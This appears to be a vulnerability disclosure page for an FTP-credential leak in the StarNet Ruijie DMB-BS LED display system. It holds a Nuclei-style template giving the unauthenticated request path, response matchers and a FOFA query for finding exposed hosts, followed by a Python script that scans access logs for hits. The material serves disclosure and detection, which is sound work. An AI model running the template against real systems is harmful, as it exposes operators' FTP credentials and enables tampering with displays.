The StarNet Ruijie DMB-BS LED Display System has a vulnerability in its taskexport interface that discloses FTP server credentials and connection parameters to unauthorized users. An attacker who obtains them can gain unauthorized access to the FTP server and may compromise the integrity and content of the LED display system.
PoC code [publicly available]
id: starnet-dmb-bs-ftp-credentials-disclosure

info:
  name: StarNet DMB-BS - FTP Credentials Disclosure
  author: brucelsone
  severity: medium
  description: |
    The StarNet Ruijie DMB-BS LED Display System contains a security vulnerability in its taskexport interface that allows unauthorized access to FTP server credentials and connection parameters. This exposure enables potential attackers to gain unauthorized access to the FTP server, potentially compromising the integrity and content of the LED display system.
  reference:
    - https://www.ddpoc.com/DVB-2024-7055.html
    - https://blog.csdn.net/shelter1234567/article/details/145521914
  metadata:
    verified: true
    max-request: 1
    fofa-query: (app="STAR_NET-数字标牌系统" || -欢迎! -- BS3.2.02.38447- || icon_hash="-260118452")
  tags: starnet,ruijie,ftp,password,exposures,vuln

http:
  - method: GET
    path:
      - "{{RootURL}}/dmb/out/taskexport.jsp?taskcode"

    matchers:
      - type: dsl
        dsl:
          - "contains(content_type, 'text/xml')"
          - "contains_all(body, 'user=','tasks version')"
          - "status_code == 200"
        condition: and
# digest: 4b0a00483046022100a88b9431b3a2a9cdf75fd438bca152e79dbd8e1a3bbaeb7389ad5a57ab3ffe73022100ee271f64de6e2b844dbd206bea0a9044b7d00b2e0a656e981177c1e5e803dc24:922c64590222798bb761d5b6d8e72950
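For operators of an affected system, the following added example (not part of the template or of any vendor tooling) searches web access logs for requests to the endpoint the template probes and lists the clients that received a 200 response. It assumes the front-end server writes common/combined log format; the function names and the sample log lines are constructed for illustration.

```python
import re
from collections import Counter
from urllib.parse import unquote

# Endpoint from the template's request path.
TARGET = "/dmb/out/taskexport.jsp"

# Assumption: the front-end server writes common/combined log format.
LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)

def normalize(target):
    """Canonicalise a request target so equivalent spellings compare equal."""
    path = unquote(target.split("?", 1)[0])   # drop query string, decode %xx
    path = re.sub(r"/{2,}", "/", path)        # collapse duplicate slashes
    return path.lower()                       # over-match on case rather than miss

def find_hits(lines):
    """Return (ip, timestamp, status, raw target) for each request to TARGET."""
    hits = []
    for line in lines:
        m = LINE.match(line)
        if m and normalize(m["target"]) == TARGET:
            hits.append((m["ip"], m["ts"], int(m["status"]), m["target"]))
    return hits

def exposed_clients(hits):
    """Count 200 responses per client; these may have received the FTP settings."""
    return Counter(ip for ip, _, status, _ in hits if status == 200)

# Constructed sample lines using documentation-range addresses, not real traffic.
SAMPLE_LOG = [
    '203.0.113.7 - - [12/Feb/2025:10:01:02 +0000] "GET /dmb/out/taskexport.jsp?taskcode HTTP/1.1" 200 812 "-" "-"',
    '203.0.113.7 - - [12/Feb/2025:10:01:09 +0000] "GET /DMB/out/taskexport.jsp?taskcode=1 HTTP/1.1" 200 812 "-" "-"',
    '198.51.100.23 - - [12/Feb/2025:10:05:44 +0000] "GET /dmb/out/%74askexport.jsp HTTP/1.1" 404 0 "-" "-"',
    '192.0.2.10 - - [12/Feb/2025:10:06:00 +0000] "GET /dmb/login.jsp HTTP/1.1" 200 4301 "-" "-"',
]

if __name__ == "__main__":
    hits = find_hits(SAMPLE_LOG)
    for ip, ts, status, target in hits:
        print(f"{ts} {ip} {status} {target}")
    for ip, n in exposed_clients(hits).items():
        print(f"{ip}: {n} successful response(s), treat FTP credentials as disclosed")
```

Any client listed by `exposed_clients` may have received the FTP settings, so the FTP password should be rotated and access to the `/dmb/out/` path restricted to trusted networks.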